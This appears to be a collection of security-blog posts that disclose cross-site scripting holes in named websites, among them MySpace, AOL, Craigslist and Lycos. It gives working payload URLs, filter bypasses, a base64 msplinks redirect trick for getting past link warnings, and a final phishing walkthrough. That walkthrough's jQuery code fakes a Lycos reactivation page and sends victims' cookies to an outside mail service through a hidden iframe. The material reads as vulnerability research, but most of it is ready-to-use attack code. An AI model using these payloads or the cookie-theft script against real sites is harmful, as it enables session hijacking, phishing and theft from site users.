Stumpleupon.com Reflected XSS

The code that displays spelling corrections does not encode user submitted data.

http://www.stumbleupon.com/search?q=teh<script>alert(0)</script>

Ning.com Persistent XSS

Less than and greater than characters submitted in the descriptions of albums, images and probably others are unencoded. Any tags submitted in such fields are subjected to whitelist validation, but this can be bypassed by prepending a less than character to the injected open and close tags.

Exploit: <<script>alert(0)//<</script>

PoC: http://coniferous.ning.com/photo/792231134-1

Free Rein - MLive.com

MLive's profile system has no XSS protection. HTML of any sort can be entered in the About Me field.

http://connect.mlive.com/user/XSSBlog/index.html

More Reflected XSS - AOL.com

More of the same.

http://messageboards.aol.com/aol/en_us/search.php?search="style="position:absolute;top:0;left:-500px;width:9999px;height:9999px;"onmouseover="alert(0)&boardId=519911&search_all=0&search_type=2

http://finance.aol.com/lookup/"style="width:9999px;height:9999px;"onmouseover="alert(0)">/usa

And of course being a myspace white listed site these can be used to get around msplinks.

http://www.msplinks.com/MDFodHRwOi8vbWVzc2FnZWJvYXJkcy5hb2wuY29tL2FvbC9lbl91cy9zZWFyY2gucGhwP3NlYXJjaD0lMjJzdHlsZT0lMjJwb3NpdGlvbjphYnNvbHV0ZTt0b3A6MDtsZWZ0Oi01MDBweDt3aWR0aDo5OTk5cHg7aGVpZ2h0Ojk5OTlweDslMjJvbm1vdXNlb3Zlcj0lMjJ3aW5kb3cubG9jYXRpb249J2h0dHA6Ly9jcm9zcy1zaXRlLXNjcmlwdGluZy5ibG9nc3BvdC5jb20nJmJvYXJkSWQ9NTE5OTExJnNlYXJjaF9hbGw9MCZzZWFyY2hfdHlwZT0y

Bypassing Msplinks.com Revisited - Myspace.com

The technique I previously blogged about still works, but ytmnd.com has fixed the XSS vulnerability used in that posting. Here's a hole in another Msplinks.com whitelisted site:

http://www.canada.com/search/search.html?q=')}window.location='http://cross-site-scripting.blogspot.com/';{('

Just as before 01 is prefixed to the XSS redirect URL, then the result is Base64 encoded and appended to http://www.msplinks.com/.

http://www.msplinks.com/MDFodHRwOi8vd3d3LmNhbmFkYS5jb20vc2VhcmNoL3NlYXJjaC5odG1sP3E9Jyl9d2luZG93LmxvY2F0aW9uPSdodHRwOi8vY3Jvc3Mtc2l0ZS1zY3JpcHRpbmcuYmxvZ3Nwb3QuY29tLyc7eygn

Persistent XSS Vulnerability - IntenseDebate.com

The profile description field of Intense Debate has a type 2 XSS vulnerability. Using it, arbitrary code can be run when the affected profile is viewed or when the mouse cursor is over the avatar present next to comments posted by the account.

<a style="position:absolute;top:-500px;left:-500px;width:9999px;height:9999px;" onmouseover="alert(0)"></a>

http://intensedebate.com/people/JohnnyCake5

http://www.woodtv.com/dpp/your_money/wall_street/Stocks_End_Low_As_Healthcare_Recovers_2887663#IDComment35942133

Persistent XSS Vulnerability - AssociatedContent.com

Several of the fields of Associated Content profile system have persistent XSS vulnerabilities. Such a vulnerability could be used to craft a rather nasty worm.





The code shown in the screenshots is as follows:

"style="position:absolute;top:0;left:0;width:9999px;height:9999px;"onmouseover="alert(0)

http://www.associatedcontent.com/user/631547/xss_blog.html

Leveraging Existing CSS - Stickam.com

Stickam's filters are quite strict; attempting to inject a script tag results in an internal error page. The same thing happens with a variety of other tags, any event attribute, certain CSS property values (e.g. setting position to absolute) and even many of the site's CSS IDs and classes. But the filters miss some of the ID selectors that set the element position to absolute, and this can be utilized to cover the entire page with a link.

http://www.stickam.com/onlineMembers.do?personalTags="<a id="cboxTitle"style="height:9999px;width:9999px;"href="http://cross-site-scripting.blogspot.com"</a>

Sidestepping Filters - Craigslist.org

Because the of the lack of HTML encoding, tags can be injected using the search forum search feature assuming no results are found. Testing this with H1 tags yields the expected results.



However, attempting the same thing with script results in the page being rendered only up to to the opening tag.



But by adding a single character after the closing script tag, the filter causing this behavior can be sidestepped.

http://craigslist.org/forums/?SQ=fffffffff<script>alert(0)</script>f&act=RSR&forumID=8

Exploiting The Meta Tag - Local.Myspace.com

Despite the lack of HTML encoding of data passed to the vulnerable market field, tags cannot be used as sending a less than character followed by any alphabetic character redirects the user to a presumably security related error page. But by injecting the http-equiv attribute, the vulnerable meta tag can be repurposed.

http://local.myspace.com/index.cfm?fuseaction=local.hub&dma=467&market=0;http://cross-site-scripting.blogspot.com/"http-equiv="refresh"

Insecure IFrame - Myspace.com

The Myspace volunteer search results are embedded in the page using an IFrame, its source set by the searchresults field of the query string. Because no checks are performed on the URL specified by the field, any can be used. The result is a hard to detect XSS vulnerability; it even works with Internet Explorer 8 despite the new anti-XSS measures.

http://www.myspace.com/volunteerspace?searchresults=http://cross-site-scripting.blogspot.com/

Bypassing Myspace IM XSS Filters - Myspace.com

The filtering Myspace IM uses is rather aggressive. Regardless of context, document. is changed to document· and eval() to ..). By using percent-encoding and JavaScript escaped hex sequences this can be circumvented.

The vulnerability (only works when logged in):
http://myspace.com/index.cfm?fuseaction="};alert(0);var x={"":"

The vulnerability re-encoded to bypass IM filters:
http://myspace.com/index.cfm?fuseaction=%22};%65val('alert(document%5Cx2Ecookie)'%29;var%20x={%22%22:%22

Bypassing Msplinks.com Notifications - Myspace.com

As a preventative measure Myspace.com routes all user posted links through Msplinks.com. If the linked site is not on the msplinks whitelist a notification that the user is visiting an external site is displayed, and the the user must click another link to continue. To circumvent this system, an XSS vulnerability in a whitelisted site can be used as a redirect.



Fortunately ytmnd.com has a vulnerability. By prepending 01 to an xss redirect url, base64 encoding the result, and appending it to http://www.msplinks.com/ we can create a link that can be posted on Myspace. When the user clicks this link, no external site warnings are displayed.

The vulnerable whitelisted site:
http://www.ytmnd.com/search?q="]}}};window.location='http://www.asdf.com/';{{{//

A msplinks link that redirects to the xss redirect:
http://www.msplinks.com/MDFodHRwOi8vd3d3Lnl0bW5kLmNvbS9zZWFyY2g/cT0lMjIlNUQlN0QlN0QlN0Q7d2luZG93LmxvY2F0aW9uPSdodHRwOi8vd3d3LmFzZGYuY29tLyc7JTdCJTdCJTdCLy8=

Breaking Things With Null - Classifieds.Myspace.Com

Sometimes passing special characters through a query string can cause in strange behavior. Using URL encoding we can search for the null character on classifieds.myspace.com. The result is an error page notifying the user that the server is too busy, and it just so happens that the retry link has a Chrome and IE compatible XSS vulnerability.



http://classifieds.myspace.com/browse/?q=%00"onmouseover="alert(0);

And with styling:

http://classifieds.myspace.com/browse/?q=%00"onmouseover="alert(0);"style="float:left;height:999px;width:999px;margin-top:-400px

Phishing With jQuery - Registration.Lycos.Com

jQuery is a wonderful tool when the need to traverse the HTML DOM arises. With only a few lines of code the layout of a web page can be drastically altered. Using an XSS vulnerability and a bit of creativity we can manipulate http://registration.lycos.com, turning it into what appears to be a reactivation link that users must click to keep their accounts. When the user navigates to the page, the malicious code reads the value cookie and sends it to us using an anonymous mailing service. All of this will happen transparently as the user is waiting to be redirected to http://mail.lycos.com.



First, we need the vulnerability. https://registration.lycos.com/login.php?action=login&m_PR=27&m_CBURL=http://www.lycos.com/&m_U='/><script>alert('Hello, World');</script> will work.

Next is the jQuery. Using it we're going to alter the title and login form, then email the cookie value by appending a hidden iframe to TestDiv. The JavaScript below should fulfill these needs, mailing to you@yourdomain.com.

$(this).load(function() {
    $('title').html('Reactivation');
    $('form').html('<div id="TestDiv"></div><h3 style="color:green;margin:">Activated</h3>Your account has been reactivated.<br />Redirecting to <a href="http://mail.lycos.com">http://mail.lycos.com</a>...');
    var u = 'http://send-anonymous-email.com/Record.php?email_from=someemail%40domain.com&email_to=you%40yourdomain.com&subject=Have+A+Cookie&message=' + escape(document.cookie) + '&kind=html';
    $('#TestDiv').append('<iframe style="display:none;" src="' + u + '" />');

    setTimeout("window.location='http://mail.lycos.com';", 5000);
});

To obscure our code and keep the URL short we can remove all unnecessary whitespace and append it to the end of the jQuery file. Doing so would look something like this:

[jQuery] $(this).load(function(){$('title').html('Reactivation');$('form').html('<div id="TestDiv"></div><h3 style="color:green;margin:">Activated</h3>Your account has been reactivated.<br />Redirecting to <a href="http://mail.lycos.com">http://mail.lycos.com</a>...');var u='http://send-anonymous-email.com/Record.php?email_from=someemail%40domain.com&email_to=you%40yourdomain.com&subject=Have+A+Cookie&message='+escape(document.cookie)+'&kind=html';$('#TestDiv').append('<iframe style="display:none;" src="'+u+'"/>');setTimeout("window.location='http://mail.lycos.com';",5000);});

Include the modified version of jQuery using the vulnerability and the result will look like the screenshot below.

https://registration.lycos.com/login.php?action=login&m_PR=27&m_CBURL=http://www.lycos.com/&m_U='/><script src="http://www.yourdomain.com/modifiedjQuery.js"></script>